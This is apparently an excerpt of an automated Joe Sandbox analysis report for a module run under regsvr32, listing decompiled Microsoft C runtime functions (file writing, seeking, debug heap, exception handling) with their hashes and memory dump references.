                                0x7fef9d3dda2
                                0x7fef9d3ddaf
                                0x7fef9d3ddb8
                                0x7fef9d3ddba
                                0x7fef9d3ddc2
                                0x7fef9d3ddd7
                                0x7fef9d3dde8
                                0x7fef9d3ddf7
                                0x7fef9d3de01
                                0x7fef9d3de0f
                                0x7fef9d3de19
                                0x7fef9d3de1f
                                0x7fef9d3de32
                                0x7fef9d3de40
                                0x7fef9d3de4c
                                0x7fef9d3de54
                                0x7fef9d3de5d
                                0x7fef9d3de61
                                0x7fef9d3de6a
                                0x7fef9d3de80
                                0x7fef9d3de91
                                0x7fef9d3de9f
                                0x7fef9d3deab
                                0x7fef9d3deb3
                                0x7fef9d3dec6
                                0x7fef9d3ded7
                                0x7fef9d3dee5
                                0x7fef9d3def1
                                0x7fef9d3def9
                                0x7fef9d3df09
                                0x7fef9d3df19
                                0x7fef9d3df29
                                0x7fef9d3df39
                                0x7fef9d3df49
                                0x7fef9d3df59
                                0x7fef9d3df5b
                                0x7fef9d3df5d
                                0x7fef9d3df68
                                0x7fef9d3df6d
                                0x7fef9d3df76
                                0x7fef9d3df7a
                                0x7fef9d3df80
                                0x7fef9d3df95
                                0x7fef9d3dfa6
                                0x7fef9d3dfb5
                                0x7fef9d3dfdc

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2192614184-734865713
                                • Opcode ID: 18be2ec324f4e6ddaf4da83870b7f9445444224664337f66457babe689a72d53
                                • Instruction ID: 7f650dd300c45f52e976b570372fea59531d88f616deac0b68cc0cf4a1a25f4d
                                • Opcode Fuzzy Hash: 18be2ec324f4e6ddaf4da83870b7f9445444224664337f66457babe689a72d53
                                • Instruction Fuzzy Hash: 9D4128A2A0C6C286E7F09B64E8447BE72E4F38434AF600126D6C9876A9DB3ED444CF14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D39520 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c, xrefs: 000007FEF9D39578
                                • ("Invalid file descriptor. File possibly closed by a different thread",0), xrefs: 000007FEF9D39563
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: ErrorFileLastPointer__doserrno_dosmaperr
                                • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                • API String ID: 275287319-2412454244
                                • Opcode ID: c7efb4c2b63aa0ea1a393bbb45a77ac8f6d4c0e98eaf8d85a5d097220697af2b
                                • Instruction ID: 4cc925a7ddd92a70968dc62c242263200834f6053f28a3bc4a48022cf8d44a9e
                                • Opcode Fuzzy Hash: c7efb4c2b63aa0ea1a393bbb45a77ac8f6d4c0e98eaf8d85a5d097220697af2b
                                • Instruction Fuzzy Hash: FA318372A18B85C6D790CB28E88066E73A1F7857A5F604325E6FE47AF9CB3DD440CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D26210 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter_unlock
                                • String ID: (fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAY$_CrtSetDbgFlag$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                • API String ID: 2816345473-1282596470
                                • Opcode ID: 3f7f838120eed42c27c7ea3ce685aad0c3061be731b7dc7317e8a9b82dec8473
                                • Instruction ID: 5fae40e96951f3d59b44a89f64fcf0ff6634817f5e1c8960b8a37b7fc16bb0b2
                                • Opcode Fuzzy Hash: 3f7f838120eed42c27c7ea3ce685aad0c3061be731b7dc7317e8a9b82dec8473
                                • Instruction Fuzzy Hash: CF313472D1D2428AE3A08B68ED4576EB3E0F741364F615236A2CD866F5D77EE4488B00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D40070 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 55COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _free_nolock$_unlock
                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\prebuild\eh\typname.cpp$pNode->_Next != NULL
                                • API String ID: 2500497606-1087415141
                                • Opcode ID: 73e945bef0fa2e243f2cc79ce7faf04cefa07676de83a818dd77e5436e879e5d
                                • Instruction ID: 19d3e213fdd89feddaad3ed7c2e4781bfc305c80ac1e5456795dd8baf3e1709b
                                • Opcode Fuzzy Hash: 73e945bef0fa2e243f2cc79ce7faf04cefa07676de83a818dd77e5436e879e5d
                                • Instruction Fuzzy Hash: FB21FC36629B8581EB909B59E89072DA3E4F3C4B94F609426FACE437B4CF7ED444CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D35393 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Exception$Rethrow$DestroyedFindFrameObjectRaiseUnlink
                                • String ID: csm
                                • API String ID: 933340387-1018135373
                                • Opcode ID: 185150422f69e9325bbbdd07ff6b0460cc0f5d94f5833ed3dae1d6afaaf19a73
                                • Instruction ID: be7caa3ba3d0a30f9fef9d29ccc0ee5b0ac29a888dcf6323555a590ed5530147
                                • Opcode Fuzzy Hash: 185150422f69e9325bbbdd07ff6b0460cc0f5d94f5833ed3dae1d6afaaf19a73
                                • Instruction Fuzzy Hash: BE21FA32A0C64582DAA09B15E49076D67A0F7C0B52F611136EADE077B5CB3BD4418B00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D39694 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: __doserrno_invalid_parameter
                                • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                • API String ID: 4140903211-23161695
                                • Opcode ID: 32410c4887627c76782b03988199a8b6bafae630e8670220b1a4c16fdf178152
                                • Instruction ID: 83327c57c34769199563c7dbb3a6bce46be38180c11154985772b493e57d3243
                                • Opcode Fuzzy Hash: 32410c4887627c76782b03988199a8b6bafae630e8670220b1a4c16fdf178152
                                • Instruction Fuzzy Hash: 611127B1A29602CAF7D0AB24ED5476E72E1F380389F60A125E2DD426E4D7BEE5448B41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D39939 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: __doserrno_invalid_parameter
                                • String ID: (buf != NULL)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                • API String ID: 4140903211-3042049227
                                • Opcode ID: b156558e5a530bd8cc364ecba4e09f8d8b9f154ab820f1b2babcd7abee70c9c3
                                • Instruction ID: 227cbb44b92b13f2699fc348b07479794ffd84b2571dbd840c84b1baf771b638
                                • Opcode Fuzzy Hash: b156558e5a530bd8cc364ecba4e09f8d8b9f154ab820f1b2babcd7abee70c9c3
                                • Instruction Fuzzy Hash: 1A115731E0C6429AF7A49F24EC117AE73D0F780398FA09126D2CD426E5DB7EE644CB11
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3976D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: __doserrno_invalid_parameter
                                • String ID: (_osfile(fh) & FOPEN)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                • API String ID: 4140903211-1338331675
                                • Opcode ID: 11864ca282438847dd27f4dc85d1758fde49d78cd6d39020a8393d86cd701a27
                                • Instruction ID: 6bd6a3a9ad0f3f204fba163462b9475bfd771603381d6f38345b55863188decb
                                • Opcode Fuzzy Hash: 11864ca282438847dd27f4dc85d1758fde49d78cd6d39020a8393d86cd701a27
                                • Instruction Fuzzy Hash: 0B0108B1A1C642C6FBA0AB64EC407AD36E0F380358FB04125E2CD476F5D7BEE9458B41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D39A9B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 17COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: DecodePointer__doserrno_invalid_parameter
                                • String ID: ((cnt & 1) == 0)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                • API String ID: 1098298932-1795423647
                                • Opcode ID: 17be20b0b4ddc98d10ae5d9642fe0f8cd8b1b2069c373d6ecdcef621e5a80c70
                                • Instruction ID: 84e1f9b7d4b50a62aaca49ed338a5ee7eeb2a48d33c586d02a205ea10770b6a2
                                • Opcode Fuzzy Hash: 17be20b0b4ddc98d10ae5d9642fe0f8cd8b1b2069c373d6ecdcef621e5a80c70
                                • Instruction Fuzzy Hash: 8CE03961A0890691F6D4AF14EC113ED2290A740788FE1422290CC072F2CB7EA6058751
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D2F570 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 16%
                                			E000007FE7FEF9D2F570(intOrPtr __edx, long long __rcx, void* __rdx, long long __r8, void* _a8, intOrPtr _a16, long long _a24, intOrPtr _a32, void* _a40, intOrPtr _a48, intOrPtr _a64) {
				long long _v24;
				intOrPtr _v32;
				long long _v40;
				signed int _v48;
				int _v52;
				int _v56;
				signed int _v64;
				long long _v72;
				long long _t82;

				_a32 = r9d;
				_a24 = __r8;
				_a16 = __edx;
				_a8 = __rcx;
				_v56 = 0;
				if (_a48 != 0) goto 0xf9d2f5ab;
				_a48 =  *((intOrPtr*)( *_a8 + 4));
				if (_a64 == 0) goto 0xf9d2f5bf;
				_v32 = 9;
				goto 0xf9d2f5c7;
				_v32 = 1;
				_v64 = 0;
				_v72 = 0;
				r9d = _a32;
				_v48 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_v48 != 0) goto 0xf9d2f60b;
				goto 0xf9d2f6f8;
				if (0 != 0) goto 0xf9d2f652;
				if (_v48 <= 0) goto 0xf9d2f652;
				if (_v48 - 0xfffffff0 > 0) goto 0xf9d2f652;
				_t82 = _v48 + _v48 + 0x10;
				E000007FE7FEF9D2F3B0(malloc(??), 0xdddd, _t82);
				_v24 = _t82;
				goto 0xf9d2f65b;
				_v24 = 0;
				_v40 = _v24;
				if (_v40 != 0) goto 0xf9d2f674;
				goto 0xf9d2f6f8;
				E000007FE7FEF9D232B0(0, _a48, 0, _v40, __rdx, _v48 << 1);
				_v64 = _v48;
				_v72 = _v40;
				r9d = _a32;
				_v52 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_v52 == 0) goto 0xf9d2f6ea;
				r8d = _v52;
				_v56 = GetStringTypeW(??, ??, ??, ??);
				E000007FE7FEF9D2F3E0(_v40);
				return _v56;
			}












                                0x7fef9d2f570
                                0x7fef9d2f575
                                0x7fef9d2f57a
                                0x7fef9d2f57e
                                0x7fef9d2f587
                                0x7fef9d2f597
                                0x7fef9d2f5a4
                                0x7fef9d2f5b3
                                0x7fef9d2f5b5
                                0x7fef9d2f5bd
                                0x7fef9d2f5bf
                                0x7fef9d2f5c7
                                0x7fef9d2f5cf
                                0x7fef9d2f5d8
                                0x7fef9d2f5f9
                                0x7fef9d2f602
                                0x7fef9d2f606
                                0x7fef9d2f60f
                                0x7fef9d2f616
                                0x7fef9d2f62a
                                0x7fef9d2f631
                                0x7fef9d2f646
                                0x7fef9d2f64b
                                0x7fef9d2f650
                                0x7fef9d2f652
                                0x7fef9d2f660
                                0x7fef9d2f66b
                                0x7fef9d2f66f
                                0x7fef9d2f686
                                0x7fef9d2f68f
                                0x7fef9d2f698
                                0x7fef9d2f69d
                                0x7fef9d2f6bf
                                0x7fef9d2f6c8
                                0x7fef9d2f6d2
                                0x7fef9d2f6e6
                                0x7fef9d2f6ef
                                0x7fef9d2f6fc

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$AllocaMarkStringTypemalloc
                                • String ID:
                                • API String ID: 2618398691-0
                                • Opcode ID: 05827e3f81ca9d4f9e036e9cc38fe06689f9ef4e573a4afec1c92632646a1a95
                                • Instruction ID: 79d90a16a348acae5d1e8c33d658c717d72e619f6ed261e78ac23a31a9732c13
                                • Opcode Fuzzy Hash: 05827e3f81ca9d4f9e036e9cc38fe06689f9ef4e573a4afec1c92632646a1a95
                                • Instruction Fuzzy Hash: 9941E7726187818AD7A08B19E48476EB7E0F385795F204525EADE43BB8DB7ED484CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3FF00 Relevance: 7.6, APIs: 5, Instructions: 79COMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 20%
                                			E000007FE7FEF9D3FF00(intOrPtr __ecx, intOrPtr _a8) {
				signed int _v16;
				signed int _v20;
				signed int _v24;

				_a8 = __ecx;
				_v24 = 0;
				_v16 = 0;
				0xf9d29300();
				_v20 = 0;
				_v20 = _v20 + 1;
				if (_v20 -  *0xf9d4e520 >= 0) goto 0xf9d40042;
				if ( *((long long*)( *0xf9d4d500 + _v20 * 8)) == 0) goto 0xf9d4003d;
				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0xf9d4003d;
				E000007FE7FEF9D3AE90(_v20,  *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)));
				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0xf9d40024;
				if (_a8 != 1) goto 0xf9d3ffe1;
				if (E000007FE7FEF9D3FD70( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8))) == 0xffffffff) goto 0xf9d3ffdf;
				_v24 = _v24 + 1;
				goto 0xf9d40024;
				if (_a8 != 0) goto 0xf9d40024;
				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000002) == 0) goto 0xf9d40024;
				if (E000007FE7FEF9D3FD70( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8))) != 0xffffffff) goto 0xf9d40024;
				_v16 = 0xffffffff;
				E000007FE7FEF9D3AF60(_v20,  *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)));
				goto L1;
				__ecx = 1;
				__eax = E000007FE7FEF9D29360(__eax, 1);
				if (_a8 != 1) goto 0xf9d4005b;
				__eax = _v24;
				goto 0xf9d4005f;
				__eax = _v16;
				return _v16;
			}






                                0x7fef9d3ff00
                                0x7fef9d3ff08
                                0x7fef9d3ff10
                                0x7fef9d3ff1d
                                0x7fef9d3ff23
                                0x7fef9d3ff33
                                0x7fef9d3ff41
                                0x7fef9d3ff58
                                0x7fef9d3ff78
                                0x7fef9d3ff92
                                0x7fef9d3ffb2
                                0x7fef9d3ffb9
                                0x7fef9d3ffd3
                                0x7fef9d3ffdb
                                0x7fef9d3ffdf
                                0x7fef9d3ffe6
                                0x7fef9d40000
                                0x7fef9d4001a
                                0x7fef9d4001c
                                0x7fef9d40038
                                0x7fef9d4003d
                                0x7fef9d40042
                                0x7fef9d40047
                                0x7fef9d40051
                                0x7fef9d40053
                                0x7fef9d40059
                                0x7fef9d4005b
                                0x7fef9d40063

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _fflush_nolock$_lock_file2_unlock_unlock_file2
                                • String ID:
                                • API String ID: 1144694634-0
                                • Opcode ID: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                • Instruction ID: ac60367dbbc332a4a9212cb966813f3525e1d277dda9a6ba7eb8e741a9ed9bf6
                                • Opcode Fuzzy Hash: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                • Instruction Fuzzy Hash: D441F136A08905C5EB70CB1DE98173D73E0F799B49F204225EA9D877B4CB3EE945CA01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D33CC0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 186COMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 27%
                                			E000007FE7FEF9D33CC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
				long long _v16;
				long long _v24;
				intOrPtr _v32;
				long long _v40;
				long long _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v64;
				long long _v72;
				char _v80;
				long long _v88;
				void* _t135;
				void* _t145;
				void* _t147;
				void* _t148;
				void* _t149;
				signed int* _t200;
				intOrPtr _t206;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				0xf9d24000();
				if ( *((intOrPtr*)(__rax + 0x2c0)) != 0) goto 0xf9d33d6c;
				if ( *_a8 == 0xe06d7363) goto 0xf9d33d6c;
				if ( *_a8 != 0x80000029) goto 0xf9d33d2a;
				if ( *((intOrPtr*)(_a8 + 0x18)) != 0xf) goto 0xf9d33d2a;
				if ( *((long long*)(_a8 + 0x60)) == 0x19930520) goto 0xf9d33d6c;
				if ( *_a8 == 0x80000026) goto 0xf9d33d6c;
				if (( *_a40 & 0x1fffffff) - 0x19930522 < 0) goto 0xf9d33d6c;
				if ((_a40[9] & 0x00000001) == 0) goto 0xf9d33d6c;
				goto 0xf9d3409c;
				if (( *(_a8 + 4) & 0x00000066) == 0) goto 0xf9d33ef3;
				if (_a40[1] == 0) goto 0xf9d33ee4;
				if (_a48 != 0) goto 0xf9d33ee4;
				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0xf9d33e40;
				if ( *_a8 != 0x80000026) goto 0xf9d33e40;
				_v56 = E000007FE7FEF9D33A60(_a24, _a40, _a32,  *((intOrPtr*)(_a24 + 0xf8)));
				if (_v56 - 0xffffffff < 0) goto 0xf9d33e0a;
				if (_v56 - _a40[1] >= 0) goto 0xf9d33e0a;
				goto 0xf9d33e0f;
				E000007FE7FEF9D2CF80(_a40);
				r9d = _v56;
				E000007FE7FEF9D34F20(_a40, _a16, _a32, _a40);
				goto 0xf9d33ec7;
				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0xf9d33ec7;
				if ( *_a8 != 0x80000029) goto 0xf9d33ec7;
				_v48 = _a8;
				_v52 =  *((intOrPtr*)(_v48 + 0x38));
				if (_v52 - 0xffffffff < 0) goto 0xf9d33e95;
				if (_v52 - _a40[1] >= 0) goto 0xf9d33e95;
				goto 0xf9d33e9a;
				E000007FE7FEF9D2CF80(_a40);
				r9d = _v52;
				E000007FE7FEF9D34F20(_v48,  *((intOrPtr*)(_v48 + 0x28)), _a32, _a40);
				goto 0xf9d3409c;
				E000007FE7FEF9D2E790(_v52 - _a40[1], _v48, _a16, _a32, _a40);
				goto 0xf9d34097;
				if (_a40[3] != 0) goto 0xf9d33f59;
				if (( *_a40 & 0x1fffffff) - 0x19930521 < 0) goto 0xf9d34097;
				_t200 = _a40;
				if ( *((intOrPtr*)(_t200 + 0x20)) == 0) goto 0xf9d33f44;
				_t135 = E000007FE7FEF9D2E680( *_a40 & 0x1fffffff, _t200);
				_v24 = _t200 + _a40[8];
				goto 0xf9d33f4d;
				_v24 = 0;
				if (_v24 == 0) goto 0xf9d34097;
				if ( *_a8 != 0xe06d7363) goto 0xf9d34041;
				if ( *((intOrPtr*)(_a8 + 0x18)) - 3 < 0) goto 0xf9d34041;
				if ( *((intOrPtr*)(_a8 + 0x20)) - 0x19930522 <= 0) goto 0xf9d34041;
				_t206 =  *((intOrPtr*)(_a8 + 0x30));
				if ( *((intOrPtr*)(_t206 + 8)) == 0) goto 0xf9d33fc5;
				E000007FE7FEF9D2E6A0(_t135, _t206);
				_v16 = _t206 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 8));
				goto 0xf9d33fce;
				_v16 = 0;
				_v40 = _v16;
				_t177 = _v40;
				if (_v40 == 0) goto 0xf9d34041;
				_v64 = _a64 & 0x000000ff;
				_v72 = _a56;
				_v80 = _a48;
				_v88 = _a40;
				_v32 = _v40();
				goto 0xf9d34097;
				_v64 = _a56;
				_v72 = _a48;
				_v80 = _a64 & 0x000000ff;
				_v88 = _a40;
				E000007FE7FEF9D340B0(_t145, _t147, _t148, _t149, _t177, _a40, _a8, _a16, _a24, _a32);
				return 1;
			}





















                                0x7fef9d33cc0
                                0x7fef9d33cc5
                                0x7fef9d33cca
                                0x7fef9d33ccf
                                0x7fef9d33cd8
                                0x7fef9d33ce4
                                0x7fef9d33cf8
                                0x7fef9d33d08
                                0x7fef9d33d16
                                0x7fef9d33d28
                                0x7fef9d33d38
                                0x7fef9d33d4e
                                0x7fef9d33d60
                                0x7fef9d33d67
                                0x7fef9d33d7c
                                0x7fef9d33d8e
                                0x7fef9d33d9c
                                0x7fef9d33db2
                                0x7fef9d33dc6
                                0x7fef9d33dec
                                0x7fef9d33df5
                                0x7fef9d33e06
                                0x7fef9d33e08
                                0x7fef9d33e0a
                                0x7fef9d33e0f
                                0x7fef9d33e2c
                                0x7fef9d33e3b
                                0x7fef9d33e50
                                0x7fef9d33e60
                                0x7fef9d33e6a
                                0x7fef9d33e77
                                0x7fef9d33e80
                                0x7fef9d33e91
